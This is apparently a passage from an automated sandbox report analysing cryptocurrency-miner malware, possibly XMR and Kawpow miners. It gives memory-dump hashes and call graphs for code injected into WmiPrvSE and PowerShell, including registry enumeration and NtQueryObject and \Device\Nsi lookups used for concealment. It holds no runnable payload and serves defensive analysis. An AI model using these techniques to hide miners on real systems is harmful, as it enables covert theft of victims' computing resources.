                        • Opcode ID: b0f9139216cfda916f49a9c1eddb34812cd0923a39870d746fd5a26fa019d228
                        • Instruction ID: 9a1dcf99747b37afc1b0da2c0e407a984b04d51d558c4ec2b93fe2d9de65d990
                        • Opcode Fuzzy Hash: b0f9139216cfda916f49a9c1eddb34812cd0923a39870d746fd5a26fa019d228
                        • Instruction Fuzzy Hash: 64E0C2317007105B971A661EA81085FB7EEDFC967A310842EE419C7300DF64FC0787EA
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b8e29b5b3d6601664d6b5ddc45b3a6a64be31f2202da29ad1ae043993a3809a
                        • Instruction ID: e4d84ee25c369fcddbc3cd2e5c4d71a8aa04e489b08bc2a16a83dbb8e2ae4dd1
                        • Opcode Fuzzy Hash: 8b8e29b5b3d6601664d6b5ddc45b3a6a64be31f2202da29ad1ae043993a3809a
                        • Instruction Fuzzy Hash: B5E08631919289CBCB08BFA4E86B4EDBF34EB10311B41015DD96742691EA316597CBC0
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 022471e2f090188bcd9a007d3e4017c550ba5146b84c7a40efe07fd3a17387ee
                        • Instruction ID: 14e4f204123f3169fc5ef6fd5b0a893c37684da56896e5bb5c60366d60009ca1
                        • Opcode Fuzzy Hash: 022471e2f090188bcd9a007d3e4017c550ba5146b84c7a40efe07fd3a17387ee
                        • Instruction Fuzzy Hash: 31E0DF30A08289CFC708EBF8D06586AFFF5EB45200B0081ACDA4A83352D6305861EB86
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77a9c2d9a9fdfa60182ca027e63ca379850bf7f9ea686fa02a137dcdcec2f6b8
                        • Instruction ID: cd4fc397a40e5385cc40a6091afad12e3cba7441f47faed4ec79f63e50d15012
                        • Opcode Fuzzy Hash: 77a9c2d9a9fdfa60182ca027e63ca379850bf7f9ea686fa02a137dcdcec2f6b8
                        • Instruction Fuzzy Hash: A5E04F70E482469FCB80EF7D88815A9FFF0EB59200F6085AEC959D7311E3324612CF91
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                        • Instruction ID: cfc0a06edbf1e710f10f9f6adfca2e205e5f92a5b6240534dff92d075ae557dd
                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                        • Instruction Fuzzy Hash: ECD067B1D04209AF8780EFADC94156EFBF4EB49204F6085AA8919E7311F7329A128FD1
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 885154debbfea59a09b8901c2d8c96f3cbfc00cf229541abe6b02a71af91d9ea
                        • Instruction ID: eb768d321e6a5e7a7590b3ce6040a08690a1482c5303367599b84eb81950771c
                        • Opcode Fuzzy Hash: 885154debbfea59a09b8901c2d8c96f3cbfc00cf229541abe6b02a71af91d9ea
                        • Instruction Fuzzy Hash: F3C04C2090A3D05BFF535B354DC57417FF2AD4351D70D77D58186CA417C4B8884AC712
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4863a45ff60e4e3c5405d4b56a9e7a6a5be2a16511ee40286d31ebeae04199da
                        • Instruction ID: 180be7069443dbfaad8d6bcf5592e5d188dda8144c19d18ebc4bec5c774daac4
                        • Opcode Fuzzy Hash: 4863a45ff60e4e3c5405d4b56a9e7a6a5be2a16511ee40286d31ebeae04199da
                        • Instruction Fuzzy Hash: 16D01730A0824A8B8B08EFA8E46686EFBF9EB44201F004169DA0993390EA306851CBC1
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 029b4988cc19aaa470bc6f78690438911cd431df27331d678bb00ce9e354b5f5
                        • Instruction ID: 2277777b30fd85439e88f7ab56fda9fac84b474fcea74f5d78bc054f0ec8cf3d
                        • Opcode Fuzzy Hash: 029b4988cc19aaa470bc6f78690438911cd431df27331d678bb00ce9e354b5f5
                        • Instruction Fuzzy Hash: EED067319151498BCB08ABA4E86B4BEBB38FB14301F41516DD91752291EA316A6ACEC1
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a5ead9b8f9a755d73fb5fbf7bf85fd2ef2e0a15f42746e9c4541691a1143608
                        • Instruction ID: ff467c62f06ff6be4e39a76c3b944f32cf07d1203b68ba850c60ad6ca546aa47
                        • Opcode Fuzzy Hash: 2a5ead9b8f9a755d73fb5fbf7bf85fd2ef2e0a15f42746e9c4541691a1143608
                        • Instruction Fuzzy Hash: BFC080340463849BC716CFBDD4444587F117E0212530414DDDD4B4E557C9B38082CF00
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61128178bb9076bed75fe67deb54a9cc898e92c2d4937626049e8e41c4524945
                        • Instruction ID: 11e378f3a8d903f2ff5f3c84d95ac11c0d34cbc258c5a88eb0fdcd624aaa9d06
                        • Opcode Fuzzy Hash: 61128178bb9076bed75fe67deb54a9cc898e92c2d4937626049e8e41c4524945
                        • Instruction Fuzzy Hash: 31B09230044709CFC2096FB6A408824B729BA4021A78008A9EA1E4A6A79E37E892CA44
                        Memory Dump Source
                        • Source File: 00000002.00000002.1493947059.0000000008BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_8bc0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c29e3eecd5ffdd96fd1f3af00d6aa8ce68c360f51a9eea29d42571ae1a99ec7
                        • Instruction ID: 9b5a455f45561a79e55a1ab1d37c923215b18e1205dd25d7ed1a1400635bdb61
                        • Opcode Fuzzy Hash: 7c29e3eecd5ffdd96fd1f3af00d6aa8ce68c360f51a9eea29d42571ae1a99ec7
                        • Instruction Fuzzy Hash: FEE13C707002059FEB14DF65C944BAABBF1EF48706F508A6DE406DF3A1EB71E9468B50
                        Memory Dump Source
                        • Source File: 00000004.00000002.1529880200.00007FF7DD371000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7DD370000, based on PE: true
                        • Associated: 00000004.00000002.1529854751.00007FF7DD370000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000004.00000002.1529911108.00007FF7DD37C000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000004.00000002.1529982066.00007FF7DD37F000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000004.00000002.1530015124.00007FF7DD380000.00000008.00000001.01000000.00000005.sdmp
                        • Associated: 00000004.00000002.1530585722.00007FF7DD874000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000004.00000002.1530636118.00007FF7DD8AC000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff7dd370000_Kawpow new.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction ID: aac7237fd1035bbd72c7f6fb7561da56bed2c840ac126ba4fe2fccbf45e5e563
                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction Fuzzy Hash: 76B09231918A09E4E2003B05D84135CA3606B0A740FC01026C44C06352DE6D90408B60
                        Memory Dump Source
                        • Source File: 00000006.00000002.1531994469.00007FF7A4DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7A4DB0000, based on PE: true
                        • Associated: 00000006.00000002.1531952757.00007FF7A4DB0000.00000002.00000001.01000000.00000008.sdmp
                        • Associated: 00000006.00000002.1532071654.00007FF7A4DBC000.00000002.00000001.01000000.00000008.sdmp
                        • Associated: 00000006.00000002.1532097179.00007FF7A4DBF000.00000004.00000001.01000000.00000008.sdmp
                        • Associated: 00000006.00000002.1532126079.00007FF7A4DC0000.00000008.00000001.01000000.00000008.sdmp
                        • Associated: 00000006.00000002.1533399019.00007FF7A52B4000.00000004.00000001.01000000.00000008.sdmp
                        • Associated: 00000006.00000002.1533491662.00007FF7A52EC000.00000002.00000001.01000000.00000008.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_7ff7a4db0000_xmr new.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction ID: f4e2e404eed0e19b5b02dcd3776bd5943a404d773808140b05a0aeb1e0ae5e84
                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction Fuzzy Hash: DBB09230A0660994E2003F02988135C62A06B08B81F820034C61C06372CA6E50424B20

                        Execution Graph

                        Execution Coverage:0.7%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:1.2%
                        Total number of Nodes:81
                        Total number of Limit Nodes:2
                        execution_graph 14906 2534cf91abc 14912 2534cf91628 GetProcessHeap 14906->14912 14908 2534cf91ad2 Sleep SleepEx 14910 2534cf91acb 14908->14910 14910->14908 14911 2534cf91598 StrCmpIW StrCmpW 14910->14911 14957 2534cf918b4 14910->14957 14911->14910 14913 2534cf91648 _invalid_parameter_noinfo 14912->14913 14974 2534cf91268 GetProcessHeap 14913->14974 14915 2534cf91650 14916 2534cf91268 2 API calls 14915->14916 14917 2534cf91661 14916->14917 14918 2534cf91268 2 API calls 14917->14918 14919 2534cf9166a 14918->14919 14920 2534cf91268 2 API calls 14919->14920 14921 2534cf91673 14920->14921 14922 2534cf9168e RegOpenKeyExW 14921->14922 14923 2534cf916c0 RegOpenKeyExW 14922->14923 14924 2534cf918a6 14922->14924 14925 2534cf916ff RegOpenKeyExW 14923->14925 14926 2534cf916e9 14923->14926 14924->14910 14928 2534cf91723 14925->14928 14929 2534cf9173a RegOpenKeyExW 14925->14929 14978 2534cf912bc RegQueryInfoKeyW 14926->14978 14989 2534cf9104c RegQueryInfoKeyW 14928->14989 14932 2534cf9175e 14929->14932 14933 2534cf91775 RegOpenKeyExW 14929->14933 14930 2534cf916f5 RegCloseKey 14930->14925 14934 2534cf912bc 11 API calls 14932->14934 14935 2534cf917b0 RegOpenKeyExW 14933->14935 14936 2534cf91799 14933->14936 14938 2534cf9176b RegCloseKey 14934->14938 14940 2534cf917eb RegOpenKeyExW 14935->14940 14941 2534cf917d4 14935->14941 14939 2534cf912bc 11 API calls 14936->14939 14938->14933 14942 2534cf917a6 RegCloseKey 14939->14942 14944 2534cf9180f 14940->14944 14945 2534cf91826 RegOpenKeyExW 14940->14945 14943 2534cf912bc 11 API calls 14941->14943 14942->14935 14946 2534cf917e1 RegCloseKey 14943->14946 14947 2534cf9104c 4 API calls 14944->14947 14948 2534cf91861 RegOpenKeyExW 14945->14948 14949 2534cf9184a 14945->14949 14946->14940 14953 2534cf9181c RegCloseKey 14947->14953 14951 2534cf9189c RegCloseKey 14948->14951 14952 2534cf91885 14948->14952 14950 2534cf9104c 4 API calls 14949->14950 14954 2534cf91857 RegCloseKey 14950->14954 14951->14924 14955 2534cf9104c 4 API calls 14952->14955 14953->14945 14954->14948 14956 2534cf91892 RegCloseKey 14955->14956 14956->14951 15002 2534cf914a4 14957->15002 14995 2534cfa6168 14974->14995 14977 2534cf912ae _invalid_parameter_noinfo 14977->14915 14979 2534cf91327 GetProcessHeap 14978->14979 14980 2534cf9148a __free_lconv_mon 14978->14980 14983 2534cf9133e _invalid_parameter_noinfo __free_lconv_mon 14979->14983 14980->14930 14981 2534cf91352 RegEnumValueW 14981->14983 14982 2534cf91476 GetProcessHeap 14982->14980 14983->14981 14983->14982 14985 2534cf9141e lstrlenW GetProcessHeap 14983->14985 14986 2534cf913d3 GetProcessHeap 14983->14986 14987 2534cf91443 StrCpyW 14983->14987 14988 2534cf913f3 GetProcessHeap 14983->14988 14997 2534cf9152c 14983->14997 14985->14983 14986->14983 14987->14983 14988->14983 14990 2534cf911b5 RegCloseKey 14989->14990 14993 2534cf910bf _invalid_parameter_noinfo __free_lconv_mon 14989->14993 14990->14929 14991 2534cf910cf RegEnumValueW 14991->14993 14992 2534cf9114e GetProcessHeap 14992->14993 14993->14990 14993->14991 14993->14992 14994 2534cf9116e GetProcessHeap 14993->14994 14994->14993 14996 2534cf91283 GetProcessHeap 14995->14996 14996->14977 14998 2534cf9157c 14997->14998 14999 2534cf91546 14997->14999 14998->14983 14999->14998 15000 2534cf9155d StrCmpIW 14999->15000 15001 2534cf91565 StrCmpW 14999->15001 15000->14999 15001->14999 15003 2534cf914e1 GetProcessHeap 15002->15003 15004 2534cf914c1 GetProcessHeap 15002->15004 15008 2534cfa6180 15003->15008 15005 2534cf914da __free_lconv_mon 15004->15005 15005->15003 15005->15004 15009 2534cf914f6 GetProcessHeap HeapFree 15008->15009 15010 2534cf6273c 15012 2534cf6276a 15010->15012 15011 2534cf628d4 15012->15011 15013 2534cf62858 LoadLibraryA 15012->15013 15013->15012

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: 946a088c5119399108370361b0ae6af5c38f836bde2a24ab80e596d054a11037
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 7711AD71614E0982FF60DB61FC0DB69A294A7447C7F6071249A06815B0EF7CC34C8B38

                        Control-flow Graph

                        APIs
                          • Part of subcall function 000002534CF91628: GetProcessHeap.KERNEL32 ref: 000002534CF91633
                          • Part of subcall function 000002534CF91628: HeapAlloc.KERNEL32 ref: 000002534CF91642
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF916B2
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF916DF
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF916F9
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91719
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF91734
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91754
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF9176F
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF9178F
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF917AA
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF917CA
                        • Sleep.KERNEL32 ref: 000002534CF91AD7
                        • SleepEx.KERNELBASE ref: 000002534CF91ADD
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF917E5
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91805
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF91820
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF91840
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF9185B
                          • Part of subcall function 000002534CF91628: RegOpenKeyExW.ADVAPI32 ref: 000002534CF9187B
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF91896
                          • Part of subcall function 000002534CF91628: RegCloseKey.ADVAPI32 ref: 000002534CF918A0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: bf6703139a628d0047449c0b9d845582e1330f97b83ba64040ff8bd1f600d1b7
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: F9310F79200E4942FF54DB26DE493A993A5AB45BD6F04B4318F09872A5FF38CA51CB38

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 8212bf0c46cfefaa552e08fc4ba0065f67311ca30eec320162d8ffe3597fee80
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: 68613432B01A9887DB54CF65880873D73A2F794BE6F189121CE5A03798DA3CD953D734

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 365 2534cf92b2c-2534cf92ba5 call 2534cfb2ce0 368 2534cf92bab-2534cf92bb1 365->368 369 2534cf92ee0-2534cf92f03 365->369 368->369 370 2534cf92bb7-2534cf92bba 368->370 370->369 371 2534cf92bc0-2534cf92bc3 370->371 371->369 372 2534cf92bc9-2534cf92bd9 GetModuleHandleA 371->372 373 2534cf92bdb-2534cf92beb GetProcAddress 372->373 374 2534cf92bed 372->374 375 2534cf92bf0-2534cf92c0e 373->375 374->375 375->369 377 2534cf92c14-2534cf92c33 StrCmpNIW 375->377 377->369 378 2534cf92c39-2534cf92c3d 377->378 378->369 379 2534cf92c43-2534cf92c4d 378->379 379->369 380 2534cf92c53-2534cf92c5a 379->380 380->369 381 2534cf92c60-2534cf92c73 380->381 382 2534cf92c83 381->382 383 2534cf92c75-2534cf92c81 381->383 384 2534cf92c86-2534cf92c8a 382->384 383->384 385 2534cf92c8c-2534cf92c98 384->385 386 2534cf92c9a 384->386 387 2534cf92c9d-2534cf92ca7 385->387 386->387 388 2534cf92d9d-2534cf92da1 387->388 389 2534cf92cad-2534cf92cb0 387->389 390 2534cf92ed2-2534cf92eda 388->390 391 2534cf92da7-2534cf92daa 388->391 392 2534cf92cc2-2534cf92ccc 389->392 393 2534cf92cb2-2534cf92cbf call 2534cf9199c 389->393 390->369 390->381 394 2534cf92dac-2534cf92db8 call 2534cf9199c 391->394 395 2534cf92dbb-2534cf92dc5 391->395 397 2534cf92cce-2534cf92cdb 392->397 398 2534cf92d00-2534cf92d0a 392->398 393->392 394->395 400 2534cf92df5-2534cf92df8 395->400 401 2534cf92dc7-2534cf92dd4 395->401 397->398 403 2534cf92cdd-2534cf92cea 397->403 404 2534cf92d0c-2534cf92d19 398->404 405 2534cf92d3a-2534cf92d3d 398->405 411 2534cf92e05-2534cf92e12 lstrlenW 400->411 412 2534cf92dfa-2534cf92e03 call 2534cf91bbc 400->412 401->400 410 2534cf92dd6-2534cf92de3 401->410 413 2534cf92ced-2534cf92cf3 403->413 404->405 406 2534cf92d1b-2534cf92d28 404->406 408 2534cf92d4b-2534cf92d58 lstrlenW 405->408 409 2534cf92d3f-2534cf92d49 call 2534cf91bbc 405->409 414 2534cf92d2b-2534cf92d31 406->414 416 2534cf92d7b-2534cf92d8d call 2534cf93844 408->416 417 2534cf92d5a-2534cf92d64 408->417 409->408 420 2534cf92d93-2534cf92d98 409->420 418 2534cf92de6-2534cf92dec 410->418 422 2534cf92e14-2534cf92e1e 411->422 423 2534cf92e35-2534cf92e3f call 2534cf93844 411->423 412->411 431 2534cf92e4a-2534cf92e55 412->431 413->420 421 2534cf92cf9-2534cf92cfe 413->421 414->420 426 2534cf92d33-2534cf92d38 414->426 416->420 424 2534cf92e42-2534cf92e44 416->424 417->416 429 2534cf92d66-2534cf92d79 call 2534cf9152c 417->429 430 2534cf92dee-2534cf92df3 418->430 418->431 420->424 421->398 421->413 422->423 425 2534cf92e20-2534cf92e33 call 2534cf9152c 422->425 423->424 424->390 424->431 425->423 425->431 426->405 426->414 429->416 429->420 430->400 430->418 436 2534cf92ecc-2534cf92ed0 431->436 437 2534cf92e57-2534cf92e5b 431->437 436->390 441 2534cf92e5d-2534cf92e61 437->441 442 2534cf92e63-2534cf92e7d call 2534cf985c0 437->442 441->442 444 2534cf92e80-2534cf92e83 441->444 442->444 447 2534cf92ea6-2534cf92ea9 444->447 448 2534cf92e85-2534cf92ea3 call 2534cf985c0 444->448 447->436 449 2534cf92eab-2534cf92ec9 call 2534cf985c0 447->449 448->447 449->436
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: bfd568e71b8665121d65f7dbb72c34bbbbd381846a5a1f1ca725e7621fb0c54c
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 0BB1BE76211E5882EF65DF65CC883B9A3A4FB44BD6F006016EE09537A4DB39CE40CB78
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: a721a9b3e4f82a05d05c5f93b5d54d49e644b1881e8a88945eb95be96a4faa67
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: FF314F72205F848AEB60DF60E8447EDB3A4F784785F44542ADA4D57B98EF3DC648CB24
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: cc8ed2d9353cbff719208e6f59e9c3bba0973f6e7792d0cbdd2cdd7bddc72f7a
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: 8A316E36214F8486EB60CF25EC4479EB3A0F789796F601126EA9D43B98DF3CC645CB24
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: e0a08e122286764cff15f51f871d45784cceffa2e24aeec936a64a77420135c7
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: 8D113336710F0589EF00CF60EC593A833A4F759B99F441D21EA6D46794DF7CC2A483A0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                        • Instruction ID: a09f1422dd15a96b7cc5ef19c9f4734b83476b3b1908e383a6416fdf588949a2
                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                        • Instruction Fuzzy Hash: C951D532700A8489FF20DB72AC4879ABBA5F7447D9F145115EE5927B99DB3CC601CB28
                        APIs
                          • Part of subcall function 000002534CF914A4: GetProcessHeap.KERNEL32 ref: 000002534CF914C5
                          • Part of subcall function 000002534CF914A4: HeapFree.KERNEL32 ref: 000002534CF914D4
                          • Part of subcall function 000002534CF914A4: GetProcessHeap.KERNEL32 ref: 000002534CF914E1
                          • Part of subcall function 000002534CF914A4: HeapFree.KERNEL32 ref: 000002534CF914F0
                          • Part of subcall function 000002534CF914A4: GetProcessHeap.KERNEL32 ref: 000002534CF91500
                          • Part of subcall function 000002534CF911D4: GetProcessHeap.KERNEL32 ref: 000002534CF911E1
                          • Part of subcall function 000002534CF911D4: HeapFree.KERNEL32 ref: 000002534CF911F0
                          • Part of subcall function 000002534CF911D4: GetProcessHeap.KERNEL32 ref: 000002534CF91200
                        • GetProcessHeap.KERNEL32 ref: 000002534CF91912
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: d75aecba9ac61c9fb542969a54dbcc8f2d065bcf5d1713c95c0cfb5eef25cc87
